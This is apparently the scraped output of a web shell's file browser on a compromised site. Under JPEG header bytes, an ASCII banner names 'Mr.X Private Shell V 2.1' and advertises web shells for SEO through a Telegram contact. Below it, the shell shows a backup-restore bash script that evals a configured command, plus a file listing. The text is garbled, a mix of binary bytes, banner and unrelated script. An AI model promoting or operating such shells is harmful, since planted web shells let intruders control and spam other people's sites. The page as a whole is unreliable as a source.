����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# run the external restore program
LogPrint "Running external restore command"
Log "Running '${EXTERNAL_RESTORE[@]}'"
eval "${EXTERNAL_RESTORE[@]}"
ret=$?
if IsInArray $ret "${EXTERNAL_IGNORE_ERRORS[@]}" ; then
Log "WARNING: Ignoring external restore command exit code of '$ret'."
elif test $ret -gt 0 ; then
Error "External restore command failed with $ret"
fi
LogPrint "Finished external restore command"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 500_restore_with_external.sh | File | 409 B | 0644 |
|